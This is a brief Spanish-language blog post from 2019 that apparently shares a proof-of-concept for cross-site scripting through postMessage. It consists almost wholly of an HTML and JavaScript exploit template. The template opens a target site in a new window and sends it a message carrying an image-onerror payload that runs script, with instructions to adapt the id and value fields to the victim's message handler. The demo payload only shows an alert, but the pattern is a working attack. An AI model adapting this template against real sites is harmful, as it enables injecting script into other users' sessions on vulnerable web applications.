martes, 11 de junio de 2019

xss Via PostMessage

Poc ejemplo xss PostMessage, id y value deben cambiarse dependiendo de el codigo de postMessage.

<a href="#" onclick="xss()">click me</a>
<script>
function xss() {
    var win = window.open('http://victima.com/', '_blank');
    setTimeout(function() {
    win.postMessage({"id":1,"value":"<img src=x onerror=alert(document.domain)>"}, '*');
    }, 1000);
}
</script>

No hay comentarios:

Publicar un comentario